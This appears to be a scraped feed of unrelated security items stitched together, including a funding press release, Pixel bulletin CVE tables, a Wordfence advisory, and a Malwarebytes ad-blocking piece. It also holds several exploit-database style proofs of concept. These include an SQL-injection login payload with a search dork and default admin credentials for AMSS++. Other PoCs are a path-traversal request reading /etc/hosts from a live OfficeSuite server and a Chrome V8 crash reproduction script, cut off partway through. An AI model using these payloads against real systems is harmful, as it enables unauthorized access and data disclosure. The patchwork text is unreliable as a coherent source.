The investment will allow enterprises to further secure non-human identities and safely leverage the soaring adoption of third-party apps and Generative AI services.

**New York, June 28, 2023** – Astrix Security, the enterprise’s trusted solution for securing non-human identities, has secured $25 million in Series A funding led by CRV with participation from existing investors Bessemer Venture Partners and F2 Venture Capital. This new investment brings Astrix’s total funding to almost $40 million. 

Fueled by the increased adoption of automation and generative AI initiatives, the enterprise’s connectivity to third-party applications is growing, resulting in an increase in cyber attacks targeting non-human app-to-app connections (via API keys, access tokens, service accounts, etc.) – as seen in high profile attacks against CircleCI, Mailchimp, GitHub, Microsoft, and Slack. 

Despite financial instability within the market, Astrix is experiencing exponential year-over-year growth and momentum as a leader in securing this growing threat vector. The company recently added Figma, Priceline, Bloomreach, Rapyd and many others to its customer roster and was recognized as a finalist in the 2023 RSA Innovation Sandbox contest. The business also doubled its headcount, and will use this funding to continue expanding the team in both the U.S. and Tel Aviv offices, including its research team who recently discovered GhostToken, a critical 0-day vulnerability in the Google Cloud Platform. 

“We founded Astrix to close a significant and unaddressed security gap, by allowing security teams to extend access management and threat detection to the non-human identity layer,” said Alon Jackson, CEO and co-founder at Astrix. “It’s amazing to experience the tremendous adoption by security teams, as well as see Astrix’s capabilities become essential to their every-day security arsenal. We look forward to continuing to expand our capabilities and partnerships, allowing organizations to truly reap the benefits of third-party services, especially Gen-AI apps, without compromising security.”

The enterprise environment depends on a vast web of interconnected apps, supported with an average of 10,000 app-connections for every 1,000 employees. More so, with AI-powered apps being downloaded 1506% more than last year, and often connected by employees across departments without the security team’s knowledge, having visibility and governance into every third-party connection is virtually impossible. While existing solutions focus on securing user-connections, Astrix is the first solution to focus on securing app-connections, allowing the enterprise to ensure their core systems are securely connected to each other and to third-party services.

“As a growing threat vector, there has been a shift in the market to focus on third-party connectivity,” said James Green, General Partner at CRV. “Astrix caught our eye for their innovative approach to extending IAM and threat detection to all non-human identities, giving unprecedented capabilities to manage the growing API-based third-party attack surface across all environments.”

“Partnering with Astrix from inception, we’ve seen the vast impact they’ve had on the industry in a short amount of time,” said Amit Karp, Partner at Bessemer Venture Partners. “From raising awareness to this growing attack surface to supporting some of the leading companies in the world, we’re excited for what’s to come as Astrix expands and continues protecting customers from the next supply chain attack.”

“The progress Astrix has made from seed funding to now is incredible,” said Jonathan Saacks, Managing Partner at F2 Venture Capital. “The company has made a mark on the industry already, and with the wealth of knowledge and experience from this team, we are confident they will continue to be the security asset every business needs and relies on in their toolbox.”

The Astrix Security Platform is the first solution to provide holistic visibility into all non-human connections and identities. Astrix provides a consolidated, comprehensive view of all the internal and third-party integrations within a business environment, as well as all access keys in use (i.e., API keys, OAuth tokens, service accounts, and webhooks) and the permissions and level of access granted to each one. With Astrix, businesses can extend their identity threat detection and response capabilities to non-human identities by continuously running behavioral analysis of internal and third-party apps connected to core SaaS, IaaS and PaaS systems to detect anomalies that may indicate compromised access tokens and automatically remediate risky connections.

**About Astrix Security**

Founded in Tel Aviv in 2021, Astrix Security helps cloud-first companies defend against a new generation of supply chain attacks. Astrix provides holistic visibility into all non-human connections and identities – automatically detecting and remediating over-privileged, unnecessary, misbehaving and malicious app-to-app connections to prevent supply chain attacks, data leaks and compliance violations. Led by two veterans of the Israel Defense Force 8200 military intelligence unit, CEO Alon Jackson and CTO Idan Gour, Astrix’s team is rapidly expanding. Astrix has raised nearly $40M in funding, with a Series A led by CRV, and additional investments from Bessemer Venture Partners, F2 Venture Capital, Venrock and Kmehin Ventures. Learn more at https://astrix.security or follow us on LinkedIn.

**About CRV**

CRV is a venture capital firm that invests in early-stage startups. Since 1970, the firm has invested in more than 500 startups at their most crucial stages, including Airtable, DoorDash and Vercel. Founders need more than capital to build a great company. It takes a partner who understands the entrepreneurial journey and knows what it takes to win. From founding to IPO and beyond, CRV is there every step of the way. Founders rely on CRV to be trusted, long-term, committed partners, which has helped make CRV into one of the longest-running venture capital firms in the world. Learn more about CRV and the companies shaping the future at https://www.crv.com.

**About Bessemer Venture Partners** 

Bessemer Venture Partners helps entrepreneurs lay strong foundations to build and forge long-standing companies. With more than 145 IPOs and 300 portfolio companies in the enterprise, consumer and healthcare spaces, Bessemer supports founders and CEOs from their early days through every stage of growth. Bessemer’s global portfolio has included Pinterest, Shopify, Twilio, Yelp, LinkedIn, PagerDuty, DocuSign, Wix, Fiverr, and Toast and has $20 billion of assets under management. Bessemer has teams of investors and partners located in Tel Aviv, Silicon Valley, San Francisco, New York, London, Hong Kong, Boston, and Bangalore. Born from innovations in steel more than a century ago, Bessemer’s storied history has afforded its partners the opportunity to celebrate and scrutinize its best investment decisions (see Memos) and also learn from its mistakes (see Anti-Portfolio). 

**About F2**  

F2 Venture Capital is a Tel Aviv-based VC firm that invests in early-stage technology companies on the cutting edge.

Our team members have been investors, operators, and engineers in startups and multinational giants that changed the game over the last twenty years. With $500 million assets under management and personalized support, F2 powers visionary founders on their bold missions.

F2 also operates Israel’s most active pre-seed investment platform, to back founders with guidance, network, and capital from day zero. More details @ www.f2vc.com

Astrix Security Raises $25M in Series A Funding

In applyRemoteView of NotificationContentInflater.java, there is a possible way to hide foreground service notification due to misleading or insufficient UI. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-13Android ID: A-251586912

_Published June 13, 2023_

The Pixel Update Bulletin contains details of security vulnerabilities and functional improvements affecting supported Pixel devices (Google devices). For Google devices, security patch levels of 2023-06-05 or later address all issues in this bulletin and all issues in the June 2023 Android Security Bulletin. To learn how to check a device's security patch level, see Check and update your Android version.

All supported Google devices will receive an update to the 2023-06-05 patch level. We encourage all customers to accept these updates to their devices.

**Announcements**

*   In addition to the security vulnerabilities described in the June 2023 Android Security Bulletin, Google devices also contain patches for the security vulnerabilities described below.

**Security patches**

Vulnerabilities are grouped under the component that they affect. There is a description of the issue and a table with the CVE, associated references, type of vulnerability, severity, and updated Android Open Source Project (AOSP) versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID.

**Framework**

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20971

A-225880325

EoP

Moderate

13

CVE-2023-21171

A-261085213

EoP

Moderate

13

CVE-2023-21189

A-213942596

EoP

Moderate

13

CVE-2023-21192

A-227207653

EoP

Moderate

13

CVE-2023-21168

A-253270285

ID

Moderate

13

CVE-2023-21177

A-273906410

ID

Moderate

13

CVE-2023-21178

A-140762419

ID

Moderate

13

CVE-2023-21193

A-233006499

ID

Moderate

13

CVE-2023-21237

A-251586912

ID

Moderate

13

CVE-2023-21167

A-259942964

DoS

Moderate

13

**System**

    

CVE

References

Type

Severity

Updated AOSP versions

CVE-2023-20975

A-250573776

EoP

Moderate

13

CVE-2023-20976

A-216117246

EoP

Moderate

13

CVE-2023-20985

A-245915315

EoP

Moderate

13

CVE-2023-21172

A-262243015

EoP

Moderate

13

CVE-2023-21174

A-235822222

EoP

Moderate

13

CVE-2023-21175

A-262243574

EoP

Moderate

13

CVE-2023-21179

A-272755865

EoP

Moderate

13

CVE-2023-21183

A-235863754

EoP

Moderate

13

CVE-2023-21184

A-267809568

EoP

Moderate

13

CVE-2023-21185

A-266700762

EoP

Moderate

13

CVE-2023-21187

A-246542917

EoP

Moderate

13

CVE-2023-21191

A-269738057

EoP

Moderate

13

CVE-2023-21203

A-262246082

EoP

Moderate

13

CVE-2023-21207

A-262236670

EoP

Moderate

13

CVE-2023-21209

A-262236273

EoP

Moderate

13

CVE-2023-20968

A-262235935

ID

Moderate

13

CVE-2023-20972

A-255304665

ID

Moderate

13

CVE-2023-20973

A-260568245

ID

Moderate

13

CVE-2023-20974

A-260078907

ID

Moderate

13

CVE-2023-20977

A-254445952

ID

Moderate

13

CVE-2023-20979

A-259939364

ID

Moderate

13

CVE-2023-20980

A-260230274

ID

Moderate

13

CVE-2023-20981

A-256165737

ID

Moderate

13

CVE-2023-20982

A-260568083

ID

Moderate

13

CVE-2023-20983

A-260569449

ID

Moderate

13

CVE-2023-20984

A-242993878

ID

Moderate

13

CVE-2023-20986

A-255304475

ID

Moderate

13

CVE-2023-20987

A-260569414

ID

Moderate

13

CVE-2023-20988

A-260569232

ID

Moderate

13

CVE-2023-20989

A-260568367

ID

Moderate

13

CVE-2023-20990

A-260568354

ID

Moderate

13

CVE-2023-20991

A-255305114

ID

Moderate

13

CVE-2023-20992

A-260568750

ID

Moderate

13

CVE-2023-21027

A-216854451

ID

Moderate

13

CVE-2023-21031

A-242688355

ID

Moderate

13

CVE-2023-21169

A-274443441

ID

Moderate

13

CVE-2023-21170

A-252764410

ID

Moderate

13

CVE-2023-21173

A-262741858

ID

Moderate

13

CVE-2023-21180

A-261365944

ID

Moderate

13

CVE-2023-21181

A-264880969

ID

Moderate

13

CVE-2023-21182

A-252764175

ID

Moderate

13

CVE-2023-21188

A-264624283

ID

Moderate

13

CVE-2023-21190

A-251436534

ID

Moderate

13

CVE-2023-21194

A-260079141

ID

Moderate

13

CVE-2023-21195

A-233879420

ID

Moderate

13

CVE-2023-21196

A-261857395

ID

Moderate

13

CVE-2023-21197

A-251427561

ID

Moderate

13

CVE-2023-21198

A-245517503

ID

Moderate

13

CVE-2023-21199

A-254445961

ID

Moderate

13

CVE-2023-21200

A-236688764

ID

Moderate

13

CVE-2023-21202

A-260568359

ID

Moderate

13

CVE-2023-21204

A-262246231

ID

Moderate

13

CVE-2023-21205

A-262245376

ID

Moderate

13

CVE-2023-21206

A-262245630

ID

Moderate

13

CVE-2023-21208

A-262245254

ID

Moderate

13

CVE-2023-21210

A-262236331

ID

Moderate

13

CVE-2023-21211

A-262235998

ID

Moderate

13

CVE-2023-21212

A-262236031

ID

Moderate

13

CVE-2023-21213

A-262235951

ID

Moderate

13

CVE-2023-21214

A-262235736

ID

Moderate

13

CVE-2023-21176

A-222287335

DoS

Moderate

13

CVE-2023-21186

A-261079188

DoS

Moderate

13

CVE-2023-21201

A-263545186

DoS

Moderate

13

**Pixel**

    

CVE

References

Type

Severity

Subcomponent

CVE-2023-21066

A-250100597 \*

RCE

Critical

exynos-slsi

CVE-2023-21225

A-270403821 \*

EoP

High

Protected Confirmation

CVE-2022-39901

A-263783333 \*

ID

High

Lassen Baseband

CVE-2023-21219

A-264698379 \*

ID

High

TBD

CVE-2023-21220

A-264590585 \*

ID

High

TBD

CVE-2023-21226

A-240728187 \*

ID

High

modem

CVE-2023-21146

A-239867994 \*

EoP

Moderate

LWIS

CVE-2023-21147

A-269661912 \*

EoP

Moderate

Pixel camera driver

CVE-2023-21149

A-270050709 \*

EoP

Moderate

ShannonRcs

CVE-2023-21151

A-265149414 \*

EoP

Moderate

Google BMS Module

CVE-2023-21153

A-264259730 \*

EoP

Moderate

rild\_exynos

CVE-2023-21157

A-263783137 \*

EoP

Moderate

exynos-ril

CVE-2023-21159

A-263783565 \*

EoP

Moderate

exynos-ril

CVE-2023-21161

A-263783702 \*

EoP

Moderate

exynos-ril

CVE-2023-21222

A-266977723 \*

EoP

Moderate

libdmc

CVE-2023-21236

A-270148537 \*

EoP

Moderate

aoc\_core device driver

CVE-2023-21148

A-263783657 \*

ID

Moderate

exynos RIL

CVE-2023-21150

A-267312009 \*

ID

Moderate

audio service

CVE-2023-21152

A-269174022 \*

ID

Moderate

android.hardware.camera.provider

CVE-2023-21154

A-263783910 \*

ID

Moderate

rild\_exynos

CVE-2023-21155

A-264540700 \*

ID

Moderate

libsitril

CVE-2023-21156

A-264540759 \*

ID

Moderate

rild\_exynos

CVE-2023-21158

A-263783635 \*

ID

Moderate

exynos-ril

CVE-2023-21160

A-263784118 \*

ID

Moderate

exynos-ril

CVE-2023-21223

A-256047000 \*

ID

Moderate

Exynos SLSI

CVE-2023-21224

A-265276966 \*

ID

Moderate

exynos-slsi

**Qualcomm components**

    

CVE

References

Severity

Subcomponent

CVE-2022-33303  

A-261492548  
QC-CR#3181878 \[2\] \[3\] \[4\] \[5\] \[6\] \[7\] \[8\] \[9\]

Moderate

Kernel

**Qualcomm closed-source components**

    

CVE

References

Severity

Subcomponent

CVE-2022-33224  

A-261492743 \*

Moderate

Closed-source component

CVE-2022-33226  

A-261492388 \*

Moderate

Closed-source component

CVE-2022-33227  

A-261492566 \*

Moderate

Closed-source component

CVE-2022-33230  

A-261492641 \*

Moderate

Closed-source component

CVE-2022-33240  

A-261492550 \*

Moderate

Closed-source component

CVE-2022-33263  

A-261492485 \*

Moderate

Closed-source component

CVE-2022-33267  

A-238893635 \*

Moderate

Closed-source component

**Functional patches**

For details on the new bug fixes and functional patches included in this release, refer to the Pixel Community forum.

**Common questions and answers**

This section answers common questions that may occur after reading this bulletin.

**1\. How do I determine if my device is updated to address these issues?**

Security patch levels of 2023-06-05 or later address all issues associated with the 2023-06-05 security patch level and all previous patch levels. To learn how to check a device's security patch level, read the instructions on the Google device update schedule.

**2\. What do the entries in the _Type_ column mean?**

Entries in the _Type_ column of the vulnerability details table reference the classification of the security vulnerability.

 

Abbreviation

Definition

RCE

Remote code execution

EoP

Elevation of privilege

ID

Information disclosure

DoS

Denial of service

N/A

Classification not available

**3\. What do the entries in the _References_ column mean?**

Entries under the _References_ column of the vulnerability details table may contain a prefix identifying the organization to which the reference value belongs.

 

Prefix

Reference

A-

Android bug ID

QC-

Qualcomm reference number

M-

MediaTek reference number

N-

NVIDIA reference number

B-

Broadcom reference number

U-

UNISOC reference number

**4\. What does an \* next to the Android bug ID in the _References_ column mean?**

Issues that are not publicly available have an \* next to the Android bug ID in the _References_ column. The update for that issue is generally contained in the latest binary drivers for Pixel devices available from the Google Developer site.

**5\. Why are security vulnerabilities split between this bulletin and the Android Security Bulletins?**

Security vulnerabilities that are documented in the Android Security Bulletins are required to declare the latest security patch level on Android devices. Additional security vulnerabilities, such as those documented in this bulletin are not required for declaring a security patch level.

**Versions**

  

Version

Date

Notes

1.0

June 13, 2023

Bulletin Published

CVE-2023-21237: Pixel Update Bulletin—June 2023

WordPress Social Login and Register plugin versions 7.6.4 and below suffer from an authentication bypass vulnerability.

    Description: WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 – Authentication Bypass Affected Plugin: WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn)Plugin Slug: woocommerce-abandoned-cartAffected Versions: <= 7.6.4CVE ID: CVE-2023-2982CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Lana Codes Fully Patched Version: 7.6.5The WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 7.6.4. This is due to insufficient encryption on the user being supplied during a login validated through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they know the email address associated with that user. This was partially patched in version 7.6.4 and fully patched in version 7.6.5.Technical AnalysisThe WordPress Social Login and Register plugin, according to its settings, provides the ability for users to login to a WordPress website using a social login through various popular social media platforms and service providers. Examining the code reveals that there is a case with custom apps, where the data is sent encrypted during the login process. The data required for login must be decrypted using the secret key at the request.[View this code snippet on the blog]  While encrypting this information would normally provide protection against manipulating the request and prevent identity spoofing, we unfortunately found that the encryption key is hardcoded in vulnerable versions of the plugin, which means that threat actors also had access to the key which was not unique per WordPress installation. This makes it possible for attackers to craft a valid request containing a properly encrypted email address which vulnerable versions of the plugin use during the login process to determine the user.Ultimately, this makes it possible for threat actors to bypass authentication and gain access to arbitrary accounts on sites running a vulnerable version of the plugin. As always, authentication bypass vulnerabilities and resulting access to high privileged user accounts, make it easy for threat actors to completely compromise a vulnerable WordPress site and further infect the victim.Disclosure TimelineMay 28, 2023 – Discovery of the Authentication Bypass vulnerability in WordPress Social Login and Register.May 30, 2023 – We initiate contact with the plugin vendor asking that they confirm the inbox for handling the discussion.June 2, 2023 – The vendor confirms the inbox for handling the discussion.June 2, 2023 – We send over the full disclosure details. The vendor acknowledges the report and begins working on a fix.June 2, 2023 – Wordfence Premium, Care, and Response users receive a firewall rule to provide protection against any exploits that may target this vulnerability. Please note we delayed the firewall rule to prevent completely breaking the plugin’s core functionality.June 14, 2023 – A fully patched version of the plugin, 7.6.5, is released.July 2, 2023 – Wordfence Free users receive the same protection.ConclusionIn this blog post, we have detailed an Authentication Bypass vulnerability within the WordPress Social Login and Register plugin affecting versions 7.6.4 and earlier. This vulnerability allows threat actors to bypass authentication and gain access to the accounts of users who have abandoned their carts. The vulnerability has been fully addressed in version 7.6.5 of the plugin.We encourage WordPress users to verify that their sites are updated to the latest patched version of WordPress Social Login and Register as soon as possible.Wordfence Premium, Wordfence Care, and Wordfence Response users received a firewall rule to protect against any exploits targeting this vulnerability on June 2, 2023. Sites still using the free version of Wordfence will receive the same protection on July 2, 2023.If you know someone who uses this plugin on their site, we recommend sharing this advisory with them to ensure their site remains secure, as this vulnerability poses a significant risk.For security researchers looking to disclose vulnerabilities responsibly and obtain a CVE ID, you can submit your findings to Wordfence Intelligence and potentially earn a spot on our leaderboard.

WordPress Social Login And Register 7.6.4 Authentication Bypass

AMSS++ version 2,0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : AMSS++ v 2.0 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : http://amssplus.ubn4.go.th/amssplus_download/amssplus_4_31_install.rar                                             |  | # Dork      : แนะนำให้ใช้บราวเซอร์ Google Chrome "AMSS++"                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Login : User = admin &  pass = 1234[+] http://127.0.0.1/pmss/index.php====Greetings to :=======================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* CraCkEr * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh    |=========================================================================================================================================

AMSS++ 2.0 Insecure Settings

Alumni Club Management Tools version 2.2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Alumni Club Management Tools v 2.2.7 auth by pass Vulnerability                                                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                             | | # Vendor    : http://alumnimagnet.com                                                                                            |  | # Dork      : intext:Powered by AlumniMagnet site:edu inurl:/images.html?view_album= site:edu                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload  user : 'or''='@gmail.com pass : 'or''='[+] https://127.0.0.1/edu/admin.html====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

Alumni Club Management Tools 2.2.7 SQL Injection

Categories: Personal
Tags: ad

Tags:  advert

Tags:  block

Tags:  blocking

Tags:  advertising

Tags:  blocker

Tags:  ad block

Tags:  tracking

Tags:  cookies

Tags:  analytics

Tags:  affiliate

Tags:  adware

Tags:  IoT

We take a look at why blocking adverts and tracking is one of the best things you can do to keep your devices healthy.



(Read more...)




The post Why blocking ads is good for your digital health appeared first on Malwarebytes Labs.

Online content is largely powered and paid for by advertising. Almost every site you visit, every forum you browse, and even the online stores you buy things from is an advert extravaganza, and they don’t just stop at showing cool offers for shirts at 50% off. The scaffolding the adverts sit on goes out of its way to track you, tie you to clicks, associations, and more. More adverts, tailored to your theoretical interests, then start to follow you around across other sites. Sometimes, it’s not very sophisticated: Ever searched for the one and only quarter height stepladder you’ll ever buy in your life? Congratulations, every advert is a stepladder.

Sadly, dozens of stepladder adverts are far from your only concern. We’re going to explain why running an ad blocker is a good thing for your digital health, and highlight all of the ways things can go wrong with ads enabled.

Adverts are the biggest of business, with billions of ad impressions per month. Individual companies can rack up billions of impressions just for their own ads, before you try and figure out overall tallies. Disney and Amazon had a total of 40bn impressions between them in the first quarter of 2020, and Google is pretty much powered by advertising:

> Google is an attention merchant that – in 2022 – generated over $224 billion (almost 80% of revenues) from ads (Google Search, YouTube Ads, and Network sites.

If you want some idea of the scale of advertising you’re subjected to on a daily basis, things are only moving up. Recent research by Lunio claims that, on average, people might have seen between 500 and 1,000 ads a day in the 1970s. By 2007, when adware vendors dropping ad-spewing installers was common and ad affiliate networks in meltdown was a daily occurrence, it was estimated at 5,000. By 2021, it was an average of 6,000 to 10,000 per day.

You have adverts and pop ups on your phone. You have advertising on your video game console dashboard. There’s another batch of stepladder adverts on your desktop. Your IoT home hub either plays an occasional ad or is plugged into some other service you use to buy things from.

Your television? Well, it might be one of the upcoming models where the TV is free in return for built in adverts constantly playing on a smaller screen. This is probably as good a place as any to remind you to always read the small print, however:

> today in privacy policies pic.twitter.com/83QI7l7iFu
> 
> — shoshana wodinsky (she/her) 📉 (@swodinsky) May 16, 2023

Some of the most common types of advertising you’ll encounter include:

*   **Pay per click (PPC)**. Advertisers pay publishers every time an advert is clicked.
*   **Affiliate marketing**. With this form of marketing, the creator of a product avoids taking up the marketing slack. Instead, it is essentially outsourced to others in the form of unique affiliate links or clickthroughs offered by apps or programs. If a sale is made, the affiliate earns commission money. There may be additional incentives on offer depending on the product.
*   **Mobile ads**. These are hugely popular in “free” games, where ads may be served by the app itself, or through a network being used by the app. The links may also lead to additional phone installations.

You’ll bump into others, but these are the three main areas of advertising which you’ll probably experience on a daily basis. They’re also a potential goldmine for scammers.

PPC is one of the oldest forms of advertising. Bogus ad clicking tools that artificially inflate revenue have been around forever, to various degrees of sophistication. Basic forms of malware are programmed to autoclick ads detected on websites. Other enterprising individuals concoct ways of manually clicking ads in ways which would not look suspicious to the advertisers.

Affiliate advertising is where much of the ad network chaos takes place. Back in the adware vendor days, rogue ad campaigns using malware, exploits, or fake products to make adware cash would be shut down after much outrage. The adware vendor would make a lot of noise about “rogue affiliates”, and claim it wasn’t their fault. Everything would go back to this same routine the day after and adware vendors would pretend they were somehow free of blame in all of this. Sometimes they would be sued into the ground and abandon the adware life, and other times the evidence of dubious antics were on display for all to see.

Even now, in the case of rogue advertising involving malware (malvertising) there’s often an affiliate component to the “your PC is now compromised” pipeline. You’ll encounter it in many ways:

*   Rogue sponsored adverts which sit above organic results in services like Google and Yahoo! search engines. These links may imitate brands or other services to entice you to click
*   Fake adverts embedded on websites. These also mimic popular brands to drive clicks
*   Compromised websites which may look like a familiar service, but every link offered up is potentially harmful to your PC

The ads in search engine results which look as though they resolve to legitimate sites like Amazon can also be harmful. This is as a result of advertisers being able to display a brand’s official URL within the ad snippet, even when an ad URL has nothing to do with the brand. From here you could be sent to a phishing page, a fake tech support site, or worse. Below you can see an example of a supposedly genuine sponsored ad which actually leads to a fake Amazon login.

Exploits are often a key component of malvertising attacks, and without the right protection on board you may realise too late that something has gone badly wrong.

On top of all this, we have the previously mentioned tracking going on under the hood. Web beacons are used to monitor activity on a website. Tracking cookies shared by multiple services constantly build up a picture of what you’ve done. So-called “shadow profiles” are used to track the activity of people who don’t even use a particular service.

Finally, we have the issue of speed. Lots of ads, tracking, and page elements being served up from different points of origin can all contribute to slowing down your browsing. You’ve almost certainly experienced the “thrill” of a website serving up the ads before the content at some point. This often happens because the ads are served from dedicated content delivery networks (CDNs). Their purpose is to get the ad in front of you as fast as possible, which can mean ads are the first thing you see. While your connection is (probably) a lot better now than it was five years ago, this can still cause issues in some cases...and who wants adverts to be the first thing they see on a page anyway?

As you may have gathered, it’s the marketing Wild West out there. It’s also worth noting that sites such as YouTube are now experimenting with detecting ad blockers, and disallowing users to view videos until their ad blocker is turned off.

**So what can we do about it?**

*   **Pick the right browser for your needs**. Increasingly, browsers offer more options to specify a level of tracking and advertising that you’re comfortable with. Back in 2020, Safari started blocking third party tracking cookies by default. Firefox has gone down the path of individual cookie jars, called “Total Cookie Protection”, which prevents tracking across websites. Elsewhere, Google is still delaying the sunsetting of third party tracking cookies.
*   **Extend your options**. On the subject of browsers, most will allow you to install extensions to increase your blocking capabilities. Some browsers like Opera include their own ad blocker by default which can be enabled in two clicks. You can also try Malwarebytes Browser Guard, which filters out ads and scams as well as blocking trackers that spy on you.
*   **Beware shady blockers**. You’ll sometimes see fake blockers riding on the coat tails of legitimate products. You may also run into websites or services which claim to dodge ad blocker detection, but serve up spam or surveys. Always do some research on anything you plan to install. Reviews and store rankings can help with this.
*   **Tackle the scripts**. It’s not “just” ads on the surface level. You also need to consider the tracking scripts, cookies, and everything else happening invisibly. Ensure your setup allows for taking care of third party ad tracking.
*   **Things will break**. A note of caution: Blocking scripts or other functionality can break some websites. You’ll need to customise your settings in these situations. Some products integrate ads into the actual structure of a product, so removing or blocking will break the product. Tablet games where you’re granted a new life by watching an ad, for example. There may not be much you can do when this happens. Use the product as is, or cut your losses and move on.

Malwarebytes protects against annoying ads and scams while blocking trackers that spy on you.

TRY NOW

Why blocking ads is good for your digital health

Office Suite Premium version 10.9.1.42602 suffers from a local file inclusion vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Local File Inclusion

Office Suite Premium version 10.9.1.42602 suffers from a path traversal vulnerability.

    # Exploit Title: Office Suite Premium 10.9.1.42602 - Path Traversal# Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

Office Suite Premium 10.9.1.42602 Path Traversal

The Gravity Forms Google Sheet Connector WordPress plugin before 1.3.5, gsheetconnector-gravityforms-pro WordPress plugin through 1.3.5 does not have CSRF check when updating its Access Code, which could allow attackers to make logged in admin change the access code to an arbitrary one via a CSRF attack

CVE-2023-2326

Chrome suffers from an internal javascript object access vulnerability. suffers from a code execution vulnerability.

Chrome: Internal JavaScript object access via Origin Trials

VULNERABILITY DETAILS  
1. `JSObject::DefineAccessor` doesn't ensure that the receiver object is in a valid state before creating an accessor property. This allows callers to extend non-extensible objects and reconfigure non-configurable properties.  
2. The function is reachable from `IDLMemberInstaller::InstallAttributes`:  
```  
IDLMemberInstaller::InstallAttributes ->  
InstallAttribute ->  
Object::SetAccessorProperty ->  
JSObject::DefineAccessor  
```  
3. When an origin trial is activated through a `meta` tag, `InstallAttributes` might be called on a JS object that has already been modified by the user code.  
4. Some origin trials install attributes directly on the global object.

To exploit the issue:

1. Add a non-configurable property to the global object.  
2. Compile a JS function that accesses the property. The compilation dependency in [1] will be skipped.  
3. Enable an origin trial that redefines the property as configurable.  
4. Delete the property.

After that, the compiled function will reference an invalid property cell and leak the internal hole object. This is a known vulnerable condition that can be abused to execute arbitrary code.

[1] https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/js-native-context-specialization.cc;drc=837cc12de25a288edf3ac222f7265c9936e69552;l=1164

VERSION  
Google Chrome 112.0.5615.49 (Official Build) (arm64)  
Chromium 114.0.5713.0 (Developer Build) (64-bit) 

REPRODUCTION CASE  
```  
<body>  
<script>  
var container = [{}];  
function trigger() { container[0] = documentPictureInPicture; }

Reflect.defineProperty(  
    globalThis,  
    'documentPictureInPicture',  
    { configurable: false, writable: true, value: {} });  
documentPictureInPicture = {}; // Now `documentPictureInPicture` is a non-configurable mutable slot.  
for (let i = 0; i < 50000; i++) trigger();

// The \"Document Picture-in-Picture\" origin trial force-sets the `documentPictureInPicture` property  
// on the global object.  
meta = document.createElement('meta');  
meta.httpEquiv = 'Origin-Trial';  
meta.content =  
    'AstD02iOsmKKlxPbuURr1i4CKzX6AhBpjqxCMNIinwFqsdNThmojsMI8B7m8GGlR/DNu9i6t4eqEfHvhuvSxHgQAAABe' +  
    'eyJvcmlnaW4iOiJodHRwOi8vbG9jYWxob3N0OjgwMDAiLCJmZWF0dXJlIjoiRG9jdW1lbnRQaWN0dXJlSW5QaWN0dXJl' +  
    'QVBJIiwiZXhwaXJ5IjoxNjk0MTMxMTk5fQ==';  
document.head.appendChild(meta);

delete documentPictureInPicture;  
trigger();  
container[0].prop; // Trying to access a property of the hole object should cause to a crash.  
